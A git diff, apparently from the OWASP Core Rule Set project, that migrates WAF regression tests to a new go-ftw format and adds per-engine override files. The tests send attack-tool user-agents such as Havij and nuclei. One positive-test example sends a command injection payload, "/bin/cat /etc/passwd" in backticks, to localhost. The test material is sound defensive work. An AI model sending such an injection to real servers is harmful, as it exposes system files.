diff --git a/.github/ISSUE_TEMPLATE/config.yml b/.github/ISSUE_TEMPLATE/config.yml index 3b47fbf3d..73951bb2c 100644 --- a/.github/ISSUE_TEMPLATE/config.yml +++ b/.github/ISSUE_TEMPLATE/config.yml @@ -1,8 +1,8 @@ blank_issues_enabled: false contact_links: - name: Help and support - url: https://security.stackexchange.com/questions/tagged/owasp-crs + url: https://security.stackexchange.com/questions/tagged/owasp-crs about: For help and support please go here. - name: OWASP Core Rule Set mailing list - url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project + url: https://groups.google.com/a/owasp.org/g/modsecurity-core-rule-set-project about: Ask general usage questions and participate in discussions on the CRS. diff --git a/.github/workflows/test.yml b/.github/workflows/test.yml index 72c42f930..7bfb86101 100644 --- a/.github/workflows/test.yml +++ b/.github/workflows/test.yml @@ -16,7 +16,7 @@ on: # Pin tool versions to prevent problems env: - GO_FTW_VERSION: '0.6.4' + GO_FTW_VERSION: '1.0.3' jobs: regression: @@ -36,16 +36,22 @@ jobs: -p "ftw_${{ env.GO_FTW_VERSION }}_linux_amd64.tar.gz" -O - | tar -xzvf - ftw - name: "Run tests for ${{ matrix.modsec_version }}" - env: - FTW_LOGFILE: './tests/logs/${{ matrix.modsec_version }}/error.log' run: | mkdir -p "tests/logs/${{ matrix.modsec_version }}/{nginx,apache2}" chmod -R o+rw "tests/logs" docker-compose -f ./tests/docker-compose.yml up -d "${{ matrix.modsec_version }}" docker-compose -f ./tests/docker-compose.yml logs - [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ] + if ! [ "$(docker inspect ${{ matrix.modsec_version }} --format='{{.State.Running}}')" = "true" ]; then + echo "Web server failed to start. Aborting." + exit 1 + fi + ./ftw check -d tests/regression/tests - ./ftw run -d tests/regression/tests --show-failures-only + ./ftw run \ + -d tests/regression/tests \ + --log-file "tests/logs/${{ matrix.modsec_version }}/error.log" \ + --overrides tests/regression/httpd-overrides.yaml \ + --show-failures-only - name: "Change permissions if failed" if: failure() diff --git a/CONTRIBUTING.md b/CONTRIBUTING.md index 4a3e4b5b7..d556c40e4 100644 --- a/CONTRIBUTING.md +++ b/CONTRIBUTING.md @@ -372,23 +372,23 @@ Documentation on how to run the CRS test suite can be found in the [online docum Example of a simple *positive test*: ```yaml -- test_title: 932230-26 +- test_id: 26 desc: "Unix command injection" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: POST - port: 80 - uri: "/post" - data: "var=` /bin/cat /etc/passwd`" - version: HTTP/1.1 - output: - log_contains: id "932230" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: POST + port: 80 + uri: "/post" + data: "var=` /bin/cat /etc/passwd`" + version: HTTP/1.1 + output: + log: + expect_ids: [932230] ``` This test will succeed if the log output contains `id "932230"`, which would indicate that the rule in question matched and generated an alert. @@ -402,21 +402,21 @@ The rule's description field, `desc`, is important. It should describe what is b Example of a simple *negative test*: ```yaml -- test_title: 932260-4 +- test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - data: 'foo=ping pong tables' - uri: '/post' - output: - no_log_contains: id "932260" + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + data: 'foo=ping pong tables' + uri: '/post' + output: + log: + no_expect_ids: [932260] ``` This test will succeed if the log output does **not** contain `id "932260"`, which would indicate that the rule in question did **not** match and so did **not** generate an alert. diff --git a/tests/regression/README.md b/tests/regression/README.md index 540fabc56..7c8cb0e1e 100644 --- a/tests/regression/README.md +++ b/tests/regression/README.md @@ -15,22 +15,22 @@ The OWASP CRS project was part of the effort to develop the Web Application Fire --- meta: author: "csanders-git" - enabled: true name: "911100.yaml" - description: "Description" + description: "A meaningful description" + rule_id: 911100 tests: - - test_title: 911100-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - output: - no_log_contains: "id \"911100\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + output: + log: + expect_id: 911100 ``` For go-ftw, please check out from [go-ftw releases page](https://github.com/coreruleset/go-ftw/releases). diff --git a/tests/regression/coraza-overrides.yaml b/tests/regression/coraza-overrides.yaml new file mode 100644 index 000000000..39373d99f --- /dev/null +++ b/tests/regression/coraza-overrides.yaml @@ -0,0 +1,52 @@ +version: "v0.0.0" +meta: + engine: "coraza" + platform: "go" + annotations: + - purpose: "CRS test suite" +test_overrides: + - rule_id: 920100 + test_ids: [4] + reason: 'Invalid uri, Coraza not reached - 404 page not found' + output: + status: 404 + - rule_id: 920100 + test_ids: [5] + reason: 'Invalid uri, Coraza not reached - 404 page not found' + output: + status: 404 + - rule_id: 920100 + test_ids: [8] + reason: 'Go/http allows a colon in the path. Test expects status 400 or 403 (Apache behaviour)' + output: + status: 200 + log: + expect_ids: [920100] + - rule_id: 920270 + test_ids: [4] + reason: 'Rule works, log contains 920270. Test expects status 400 (Apache behaviour)' + output: + status: 200 + - rule_id: 920272 + test_ids: [5] + reason: 'Rule works, log contains 920272. Test expects status 400 (Apache behaviour)' + output: + status: 200 + - rule_id: 920290 + test_ids: [1] + reason: 'Rule works, log contains 920290. Test expects status 400 (Apache behaviour)' + output: + status: 200 + - rule_id: 920430 + test_ids: [8] + reason: 'Go/http does not allow HTTP/3.0 - 505 HTTP Version Not Supported' + output: + status: 505 + log: + no_expect_ids: [920430] + - rule_id: 932200 + test_ids: [13] + reason: 'wip' + - rule_id: 934131 + test_ids: [5, 7] + reason: 'TODO: check why we are failing to deobfuscate these payloads' diff --git a/tests/regression/httpd-overrides.yaml b/tests/regression/httpd-overrides.yaml new file mode 100644 index 000000000..19c3a957e --- /dev/null +++ b/tests/regression/httpd-overrides.yaml @@ -0,0 +1,35 @@ +version: "v0.0.0" +meta: + engine: "ModSecurity v2" + platform: "httpd" + annotations: + - purpose: "CRS test suite" +test_overrides: + - rule_id: 920360 + test_ids: [1] + reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920370 + test_ids: [1] + reason: Doesn't trigger. Needs to be fixed (https://github.com/coreruleset/coreruleset/issues/3745) + output: + status: 200 + log: + no_expect_ids: [920370] + - rule_id: 920380 + test_ids: [1] + reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value + output: + status: 200 + log: + no_expect_ids: [920380] + - rule_id: 920390 + test_ids: [1] + reason: Exceeds PCRE limits, currently segfaults on the CI + output: + expect_error: true + log: + no_expect_ids: [920390] diff --git a/tests/regression/nginx-overrides.yaml b/tests/regression/nginx-overrides.yaml new file mode 100644 index 000000000..d2b1fe98f --- /dev/null +++ b/tests/regression/nginx-overrides.yaml @@ -0,0 +1,178 @@ +version: "v0.0.0" +meta: + engine: "libmodsecurity3" + platform: "nginx" + annotations: + - os: "Debian Bullseye" + - purpose: "CRS test suite" +test_overrides: + - rule_id: 920100 + test_ids: [4] + reason: "Nginx returns a 400 bad request" + output: + status: 400 + - rule_id: 920100 + test_ids: [8] + reason: | + On Apache is not allowed to put a colon in the path. + Nginx, on the other hand, allows it, in this case, returns a 200. /index.html:80?I=Like&Apples=Today#tag. + Note that the colon is a legal character in a regular path segment, according to the RFC. + output: + status: 200 + log: + no_expect_ids: [920100] + - rule_id: 920100 + test_ids: [14] + reason: "Invalid request line produces a 400 Bad Request on Nginx. This prevents matching any rules." + output: + status: 400 + - rule_id: 920100 + test_ids: [16] + reason: "Seems like Nginx does a normalization of the request line, and if :// is sent (without a path) the request path becomes / by default" + output: + log: + no_expect_ids: [920100] + - rule_id: 920181 + test_ids: [1] + reason: "Nginx returns 400 if both Content-length and Transfer-Encoding chunked are present" + output: + status: 400 + - rule_id: 920260 + test_ids: [1, 3] + reason: | + Nginx replaces the `%u` in the URI with `\xf`. This might be a bug. + See https://github.com/owasp-modsecurity/ModSecurity/issues/3135 + output: + status: 200 + log: + no_expect_ids: [920260] + - rule_id: 920270 + test_ids: [4] + reason: "Header host with null byte causes Apache to error before it gets to CRS. Nginx allow this and libModSecurity correctly matches the rule" + output: + status: 200 + log: + expect_ids: [920270] + - rule_id: 920274 + test_ids: [1] + reason: "Nginx will accept the value for the Host header, the rule should trigger" + output: + status: 200 + log: + expect_ids: [920274] + - rule_id: 920290 + test_ids: [4] + reason: "Nginx returns 400 if Host header is missing" + output: + status: 400 + - rule_id: 920360 + test_ids: [1] + reason: Requires ARG_NAME_LENGTH to be set to an appropriately low value + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920370 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920360] + - rule_id: 920380 + test_ids: [1] + reason: Requires MAX_NUM_ARGS to be set to a sufficiently low value + output: + status: 200 + log: + no_expect_ids: [920280] + - rule_id: 920390 + test_ids: [1] + reason: Exceeds PCRE limits + output: + status: 200 + log: + no_expect_ids: [920390] + - rule_id: 920430 + test_ids: [8] + reason: "If the HTTP Protocol Version is invalid, Nginx take action before modsecurity sending a 505 response code." + output: + status: 505 + - rule_id: 920610 + test_ids: [2] + reason: "nginx happily accepts fragments" + output: + status: 200 + log: + expect_ids: [920610] + - rule_id: 920620 + test_ids: [1] + reason: "nginx retains multiple separate Content-Type headers, which is what this rule is looking for" + output: + log: + expect_ids: [920620] + - rule_id: 930110 + test_ids: [7] + reason: "nginx does not strip the dots from the URL (which httpd apparently does), hence ModSecurity sees them and the rule matches" + output: + log: + expect_ids: [930110] + - rule_id: 933110 + test_ids: [3, 13, 14, 20, 21, 22, 24, 25, 26, 27] + reason: "Nginx ignore by default request header with invalid characters (like X_Filename)" + output: + log: + no_expect_ids: [9331110] + - rule_id: 934131 + test_ids: [5] + reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" + output: + expect_error: true + - rule_id: 934131 + test_ids: [7] + reason: "The problem here is how the rules tfunc works on nginx. Waiting for a decision here: https://github.com/coreruleset/coreruleset/issues/3376" + output: + expect_error: true + - rule_id: 942131 + test_ids: [3, 5, 7] + reason: "v3 log bug, the first part of the chain always produces a log" + output: + log: + expect_ids: [942131] + - rule_id: 944100 + test_ids: [11, 12, 15, 16] + reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + output: + log: + expect_ids: [944100] + - rule_id: 944110 + test_ids: [11, 12, 15, 16] + reason: "`REQUEST_BODY` is always present, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + output: + log: + expect_ids: [944110] + - rule_id: 944120 + test_ids: [6, 7, 23, 24, 40, 41, 57, 58, 74, 75, 91, 92, 108, 109, 125, 126] + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + output: + log: + expect_ids: [944120] + - rule_id: 944140 + test_ids: [3, 8] + reason: "The header name `X_Filename` is considered invalid and is removed by nginx" + output: + status: 200 + log: + no_expect_ids: [944140] + - rule_id: 944210 + test_ids: [6, 7, 23, 24, 40, 41] + reason: "`REQUEST_BODY` is always presents, and rule catches it in case of CT application/xml. A libmodsecurity3 plugin could solve this" + output: + log: + expect_ids: [944210] + - rule_id: 980170 + test_ids: [1, 2] + reason: "libmodsecurity3 does not make any log entry about rule triggering in error.log if the rule has `noauditlog` action, like 980170" + output: + log: + no_expect_ids: [980170] diff --git a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml index 49387c8c3..371b6ea40 100644 --- a/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml +++ b/tests/regression/tests/REQUEST-911-METHOD-ENFORCEMENT/911100.yaml @@ -1,144 +1,142 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "911100.yaml" - description: "Description" +rule_id: 911100 tests: - - test_title: 911100-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "GET" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "GET" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - method: "OPTIONS" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/options" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + method: "OPTIONS" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/options" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "HEAD" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/head" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-4 + - input: + dest_addr: "127.0.0.1" + method: "HEAD" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/head" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "POST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Content-Type: "application/x-www-form-urlencoded" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/post" - data: "test=value" - version: "HTTP/1.1" - output: - no_log_contains: "id \"911100\"" - - test_title: 911100-5 + - input: + dest_addr: "127.0.0.1" + method: "POST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Content-Type: "application/x-www-form-urlencoded" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/post" + data: "test=value" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [911100] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "TEST" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/test" - version: "HTTP/1.1" - output: - log_contains: "id \"911100\"" - - test_title: 911100-6 + - input: + dest_addr: "127.0.0.1" + method: "TEST" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/test" + version: "HTTP/1.1" + output: + log: + expect_ids: [911100] + - test_id: 6 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: DELETE - port: 80 - uri: "/delete" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: DELETE + port: 80 + uri: "/delete" + version: HTTP/1.0 + output: + log: + expect_ids: [911100] + - test_id: 7 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: FOO - port: 80 - uri: "/foo" - version: HTTP/1.0 - output: - log_contains: id "911100" - - test_title: 911100-8 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: FOO + port: 80 + uri: "/foo" + version: HTTP/1.0 + output: + log: + expect_ids: [911100] + - test_id: 8 desc: Method is not allowed by policy (911100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: SUBSCRIBE - port: 80 - uri: "/subscribe" - version: HTTP/1.0 - output: - log_contains: id "911100" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: SUBSCRIBE + port: 80 + uri: "/subscribe" + version: HTTP/1.0 + output: + log: + expect_ids: [911100] diff --git a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml index 0ba29d89d..f7ec8046b 100644 --- a/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml +++ b/tests/regression/tests/REQUEST-913-SCANNER-DETECTION/913100.yaml @@ -1,131 +1,129 @@ --- meta: author: "csanders-git, azurit" - description: None - enabled: true - name: 913100.yaml +rule_id: 913100 tests: - - test_title: 913100-1 + - test_id: 1 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-2 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727) Havij + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [913100] + - test_id: 2 desc: Request Indicates a Security Scanner Scanned the Site (913100) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: Arachni/0.2.1 - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: Arachni/0.2.1 + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [913100] + - test_id: 3 desc: Request Indicates a Security Scanner Scanned the Site (913100) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Encoding: gzip,deflate - Accept-Language: en-us,en;q=0.5 - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: nuclei - method: GET - port: 80 - uri: "/get" - version: HTTP/1.0 - output: - log_contains: id "913100" - - test_title: 913100-4 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: nuclei + method: GET + port: 80 + uri: "/get" + version: HTTP/1.0 + output: + log: + expect_ids: [913100] + - test_id: 4 desc: "Scanner identification based on User-agent field" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - Host: "localhost" - User-Agent: "nessus" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-5 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + Host: "localhost" + User-Agent: "nessus" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [913100] + - test_id: 5 desc: "YUM package manager allow list" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "urlgrabber/3.10 yum/3.4.3" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" - - test_title: 913100-6 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "urlgrabber/3.10 yum/3.4.3" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [913100] + - test_id: 6 desc: "ZGrab" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "Mozilla/5.0 zgrab/0.x" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - log_contains: id "913100" - - test_title: 913100-7 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "Mozilla/5.0 zgrab/0.x" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + expect_ids: [913100] + - test_id: 7 desc: "eCairn allow list" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "913100" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "mozilla/5.0 ecairn-grabber/1.0 (+http://ecairn.com/grabber)" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [913100] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml index 6f26735a0..74d0073f8 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920100.yaml @@ -1,276 +1,268 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920100.yaml" description: "Tests to trigger, or not trigger 920100" +rule_id: 920100 tests: - - test_title: 920100-1 + - test_id: 1 desc: Standard GET request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 2 desc: | Request has tab (\t) before request method - Apache complains AH00126: Invalid URI in request GET / HTTP/1.1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: " GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/get" - version: "HTTP/1.1" - output: - status: [400] - - test_title: 920100-3 + - input: + dest_addr: "127.0.0.1" + method: " GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/get" + version: "HTTP/1.1" + output: + status: 400 + - test_id: 3 desc: Perfectly valid OPTIONS request stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "OPTIONS" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "*" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920100\"" - - test_title: 920100-4 + - input: + dest_addr: "127.0.0.1" + method: "OPTIONS" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "*" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920100] + - test_id: 4 desc: Valid CONNECT stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "CONNECT" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "1.2.3.4:80" - version: "HTTP/1.1" - output: - status: [200] - no_log_contains: "id \"920100\"" - - test_title: 920100-5 + - input: + dest_addr: "127.0.0.1" + method: "CONNECT" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: 